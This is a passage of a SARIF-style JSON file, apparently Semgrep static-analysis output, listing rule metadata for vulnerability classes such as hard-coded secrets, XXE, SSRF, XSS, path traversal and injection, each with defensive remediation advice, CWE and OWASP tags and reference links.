leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pymssql.python-pymssql-hardcoded-secret.python-pymssql-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.pymssql.python-pymssql-hardcoded-secret.python-pymssql-hardcoded-secret","id":"python.pymssql.python-pymssql-hardcoded-secret.python-pymssql-hardcoded-secret","name":"python.pymssql.python-pymssql-hardcoded-secret.python-pymssql-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.pymssql.python-pymssql-hardcoded-secret.python-pymssql-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Make sure that unverified user data can not reach the XML Parser, as it can result in XML External or Internal Entity (XXE) Processing vulnerabilities."},"help":{"markdown":"Make sure that unverified user data can not reach the XML Parser, as it can result in XML External or Internal Entity (XXE) Processing vulnerabilities.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.express-expat-xxe.express-expat-xxe)\n - [https://github.com/astro/node-expat](https://github.com/astro/node-expat)\n","text":"Make sure that unverified user data can not reach the XML Parser, as it can result in XML External or Internal Entity (XXE) Processing vulnerabilities."},"helpUri":"https://semgrep.dev/r/javascript.express.security.express-expat-xxe.express-expat-xxe","id":"javascript.express.security.express-expat-xxe.express-expat-xxe","name":"javascript.express.security.express-expat-xxe.express-expat-xxe","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.express-expat-xxe.express-expat-xxe"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected input from a HTTPServletRequest going into an LDAP query. This could lead to LDAP injection if the input is not properly sanitized, which could result in attackers modifying objects in the LDAP tree structure. Ensure data passed to an LDAP query is not controllable or properly sanitize the data."},"help":{"markdown":"Detected input from a HTTPServletRequest going into an LDAP query. This could lead to LDAP injection if the input is not properly sanitized, which could result in attackers modifying objects in the LDAP tree structure. Ensure data passed to an LDAP query is not controllable or properly sanitize the data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.tainted-ldapi-from-http-request.tainted-ldapi-from-http-request)\n - [https://sensei.securecodewarrior.com/recipes/scw%3Ajava%3ALDAP-injection](https://sensei.securecodewarrior.com/recipes/scw%3Ajava%3ALDAP-injection)\n","text":"Detected input from a HTTPServletRequest going into an LDAP query. This could lead to LDAP injection if the input is not properly sanitized, which could result in attackers modifying objects in the LDAP tree structure. Ensure data passed to an LDAP query is not controllable or properly sanitize the data."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.tainted-ldapi-from-http-request.tainted-ldapi-from-http-request","id":"java.lang.security.audit.tainted-ldapi-from-http-request.tainted-ldapi-from-http-request","name":"java.lang.security.audit.tainted-ldapi-from-http-request.tainted-ldapi-from-http-request","properties":{"precision":"very-high","tags":["CWE-90: Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.tainted-ldapi-from-http-request.tainted-ldapi-from-http-request"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Initializing a security context for Dask (`distributed`) without \"require_encryption\" keyword argument may silently fail to provide security."},"help":{"markdown":"Initializing a security context for Dask (`distributed`) without \"require_encryption\" keyword argument may silently fail to provide security.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.distributed.security.require-encryption)\n - [https://distributed.dask.org/en/latest/tls.html?highlight=require_encryption#parameters](https://distributed.dask.org/en/latest/tls.html?highlight=require_encryption#parameters)\n","text":"Initializing a security context for Dask (`distributed`) without \"require_encryption\" keyword argument may silently fail to provide security."},"helpUri":"https://semgrep.dev/r/python.distributed.security.require-encryption","id":"python.distributed.security.require-encryption","name":"python.distributed.security.require-encryption","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.distributed.security.require-encryption"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure FSX ONTAP file system is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"help":{"markdown":"Ensure FSX ONTAP file system is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-fsx-ontapfs-encrypted-with-cmk.aws-fsx-ontapfs-encrypted-with-cmk)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Ensure FSX ONTAP file system is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-fsx-ontapfs-encrypted-with-cmk.aws-fsx-ontapfs-encrypted-with-cmk","id":"terraform.aws.security.aws-fsx-ontapfs-encrypted-with-cmk.aws-fsx-ontapfs-encrypted-with-cmk","name":"terraform.aws.security.aws-fsx-ontapfs-encrypted-with-cmk.aws-fsx-ontapfs-encrypted-with-cmk","properties":{"precision":"very-high","tags":["CWE-320: CWE CATEGORY: Key Management Errors","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-fsx-ontapfs-encrypted-with-cmk.aws-fsx-ontapfs-encrypted-with-cmk"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected use of dynamic execution of JavaScript which may come from user-input, which can lead to Cross-Site-Scripting (XSS). Where possible avoid including user-input in functions which dynamically execute user-input."},"help":{"markdown":"Detected use of dynamic execution of JavaScript which may come from user-input, which can lead to Cross-Site-Scripting (XSS). Where possible avoid including user-input in functions which dynamically execute user-input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.security.detect-eval-with-expression.detect-eval-with-expression)\n - [https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval#never_use_eval!](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval#never_use_eval!)\n","text":"Detected use of dynamic execution of JavaScript which may come from user-input, which can lead to Cross-Site-Scripting (XSS). Where possible avoid including user-input in functions which dynamically execute user-input."},"helpUri":"https://semgrep.dev/r/javascript.lang.security.detect-eval-with-expression.detect-eval-with-expression","id":"javascript.lang.security.detect-eval-with-expression.detect-eval-with-expression","name":"javascript.lang.security.detect-eval-with-expression.detect-eval-with-expression","properties":{"precision":"very-high","tags":["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.security.detect-eval-with-expression.detect-eval-with-expression"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pymssql.python-pymssql-empty-password.python-pymssql-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/python.pymssql.python-pymssql-empty-password.python-pymssql-empty-password","id":"python.pymssql.python-pymssql-empty-password.python-pymssql-empty-password","name":"python.pymssql.python-pymssql-empty-password.python-pymssql-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.pymssql.python-pymssql-empty-password.python-pymssql-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"'syscall' is essentially unsafe and unportable. The DL (https://apidock.com/ruby/Fiddle) library is preferred for safer and a bit more portable programming."},"help":{"markdown":"'syscall' is essentially unsafe and unportable. The DL (https://apidock.com/ruby/Fiddle) library is preferred for safer and a bit more portable programming.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.dangerous-syscall.dangerous-syscall)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"'syscall' is essentially unsafe and unportable. The DL (https://apidock.com/ruby/Fiddle) library is preferred for safer and a bit more portable programming."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.dangerous-syscall.dangerous-syscall","id":"ruby.lang.security.dangerous-syscall.dangerous-syscall","name":"ruby.lang.security.dangerous-syscall.dangerous-syscall","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.dangerous-syscall.dangerous-syscall"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-paramiko.tainted-flask-http-request-paramiko)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-paramiko.tainted-flask-http-request-paramiko","id":"python.flask.net.tainted-flask-http-request-paramiko.tainted-flask-http-request-paramiko","name":"python.flask.net.tainted-flask-http-request-paramiko.tainted-flask-http-request-paramiko","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.net.tainted-flask-http-request-paramiko.tainted-flask-http-request-paramiko"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"X-XSS-Protection header is set to 0. This will disable the browser's XSS Filter."},"help":{"markdown":"X-XSS-Protection header is set to 0. This will disable the browser's XSS Filter.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.nestjs.security.audit.nestjs-header-xss-disabled.nestjs-header-xss-disabled)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"X-XSS-Protection header is set to 0. This will disable the browser's XSS Filter."},"helpUri":"https://semgrep.dev/r/typescript.nestjs.security.audit.nestjs-header-xss-disabled.nestjs-header-xss-disabled","id":"typescript.nestjs.security.audit.nestjs-header-xss-disabled.nestjs-header-xss-disabled","name":"typescript.nestjs.security.audit.nestjs-header-xss-disabled.nestjs-header-xss-disabled","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.nestjs.security.audit.nestjs-header-xss-disabled.nestjs-header-xss-disabled"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.crypto.symmetric-hardcoded-key.symmetric-hardcoded-key)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.crypto.symmetric-hardcoded-key.symmetric-hardcoded-key","id":"javascript.crypto.symmetric-hardcoded-key.symmetric-hardcoded-key","name":"javascript.crypto.symmetric-hardcoded-key.symmetric-hardcoded-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.crypto.symmetric-hardcoded-key.symmetric-hardcoded-key"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.xml.tainted-django-xml-libxml2.tainted-django-xml-libxml2)\n - [https://github.com/vingd/libxml2-python/blob/libxml2-python-2.9.1/libxml2.py](https://github.com/vingd/libxml2-python/blob/libxml2-python-2.9.1/libxml2.py)\n - [https://gitlab.gnome.org/GNOME/libxml2/-/wikis/Python-bindings](https://gitlab.gnome.org/GNOME/libxml2/-/wikis/Python-bindings)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) or XIncludes which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a `Billion Laughs Attack`. The best defense against XXE is to have an XML parser that supports disabling DTDs. Limiting the use of external entities from the start can prevent the parser from being used to process untrusted XML files. Reducing dependencies on external resources is also a good practice for performance reasons. It is difficult to guarantee that even a trusted XML file on your server or during transmission has not been tampered with by a malicious third-party."},"helpUri":"https://semgrep.dev/r/python.django.xml.tainted-django-xml-libxml2.tainted-django-xml-libxml2","id":"python.django.xml.tainted-django-xml-libxml2.tainted-django-xml-libxml2","name":"python.django.xml.tainted-django-xml-libxml2.tainted-django-xml-libxml2","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.xml.tainted-django-xml-libxml2.tainted-django-xml-libxml2"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Avoid rendering user input. It may be possible for a malicious user to input a path that lets them access a template they shouldn't. To prevent this, check dynamic template paths against a predefined allowlist to make sure it's an allowed template."},"help":{"markdown":"Avoid rendering user input. It may be possible for a malicious user to input a path that lets them access a template they shouldn't. To prevent this, check dynamic template paths against a predefined allowlist to make sure it's an allowed template.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-render-dynamic-path.avoid-render-dynamic-path)\n - [https://brakemanscanner.org/docs/warning_types/dynamic_render_paths/](https://brakemanscanner.org/docs/warning_types/dynamic_render_paths/)\n","text":"Avoid rendering user input. It may be possible for a malicious user to input a path that lets them access a template they shouldn't. To prevent this, check dynamic template paths against a predefined allowlist to make sure it's an allowed template."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.xss.avoid-render-dynamic-path.avoid-render-dynamic-path","id":"ruby.rails.security.audit.xss.avoid-render-dynamic-path.avoid-render-dynamic-path","name":"ruby.rails.security.audit.xss.avoid-render-dynamic-path.avoid-render-dynamic-path","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.xss.avoid-render-dynamic-path.avoid-render-dynamic-path"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. Validate the user input, perform contextual output encoding, or sanitize the input. If you have to use dangerouslySetInnerHTML, consider using a sanitization library such as DOMPurify to sanitize the HTML within."},"help":{"markdown":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. Validate the user input, perform contextual output encoding, or sanitize the input. If you have to use dangerouslySetInnerHTML, consider using a sanitization library such as DOMPurify to sanitize the HTML within.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.nextjs.react-nextjs-router-refs.react-nextjs-router-refs)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)\n","text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. Validate the user input, perform contextual output encoding, or sanitize the input. If you have to use dangerouslySetInnerHTML, consider using a sanitization library such as DOMPurify to sanitize the HTML within."},"helpUri":"https://semgrep.dev/r/typescript.nextjs.react-nextjs-router-refs.react-nextjs-router-refs","id":"typescript.nextjs.react-nextjs-router-refs.react-nextjs-router-refs","name":"typescript.nextjs.react-nextjs-router-refs.react-nextjs-router-refs","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.nextjs.react-nextjs-router-refs.react-nextjs-router-refs"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.file.tainted-shelve-flask.tainted-shelve-flask)\n - [https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems](https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems)\n - [https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://flask.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In Flask apps, consider using the Werkzeug util `werkzeug.utils.secure_filename()` to sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.flask.file.tainted-shelve-flask.tainted-shelve-flask","id":"python.flask.file.tainted-shelve-flask.tainted-shelve-flask","name":"python.flask.file.tainted-shelve-flask.tainted-shelve-flask","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.file.tainted-shelve-flask.tainted-shelve-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A byte-string (narrow string) is used in an API that expects a wide-string. This can trigger an out-of-bounds read."},"help":{"markdown":"A byte-string (narrow string) is used in an API that expects a wide-string. This can trigger an out-of-bounds read.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.strings.narrow-to-wide-string-mismatch.narrow-to-wide-string-mismatch)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR38-C.+Do+not+confuse+narrow+and+wide+character+strings+and+functions](https://wiki.sei.cmu.edu/confluence/display/c/STR38-C.+Do+not+confuse+narrow+and+wide+character+strings+and+functions)\n","text":"A byte-string (narrow string) is used in an API that expects a wide-string. This can trigger an out-of-bounds read."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.strings.narrow-to-wide-string-mismatch.narrow-to-wide-string-mismatch","id":"cpp.lang.security.strings.narrow-to-wide-string-mismatch.narrow-to-wide-string-mismatch","name":"cpp.lang.security.strings.narrow-to-wide-string-mismatch.narrow-to-wide-string-mismatch","properties":{"precision":"very-high","tags":["CWE-125: Out-of-bounds Read","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.strings.narrow-to-wide-string-mismatch.narrow-to-wide-string-mismatch"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid if possible to use it to construct the NoSQL statement."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid if possible to use it to construct the NoSQL statement.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.nosql-injection-servlets.nosql-injection-servlets)\n - [https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html)\n - [https://owasp.org/www-community/attacks/SQL_Injection](https://owasp.org/www-community/attacks/SQL_Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid if possible to use it to construct the NoSQL statement."},"helpUri":"https://semgrep.dev/r/java.servlets.security.nosql-injection-servlets.nosql-injection-servlets","id":"java.servlets.security.nosql-injection-servlets.nosql-injection-servlets","name":"java.servlets.security.nosql-injection-servlets.nosql-injection-servlets","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.nosql-injection-servlets.nosql-injection-servlets"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Ensure EMR is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"help":{"markdown":"Ensure EMR is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-emr-encrypted-with-cmk.aws-emr-encrypted-with-cmk)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Ensure EMR is encrypted at rest using KMS CMKs. CMKs gives you control over the encryption key in terms of access and rotation."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-emr-encrypted-with-cmk.aws-emr-encrypted-with-cmk","id":"terraform.aws.security.aws-emr-encrypted-with-cmk.aws-emr-encrypted-with-cmk","name":"terraform.aws.security.aws-emr-encrypted-with-cmk.aws-emr-encrypted-with-cmk","properties":{"precision":"very-high","tags":["CWE-320: CWE CATEGORY: Key Management Errors","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-emr-encrypted-with-cmk.aws-emr-encrypted-with-cmk"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found direct access to a PHP variable wihout HTML escaping inside an inline PHP statement setting data from `$_REQUEST[...]`. When untrusted input can be used to tamper with a web page rendering, it can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this 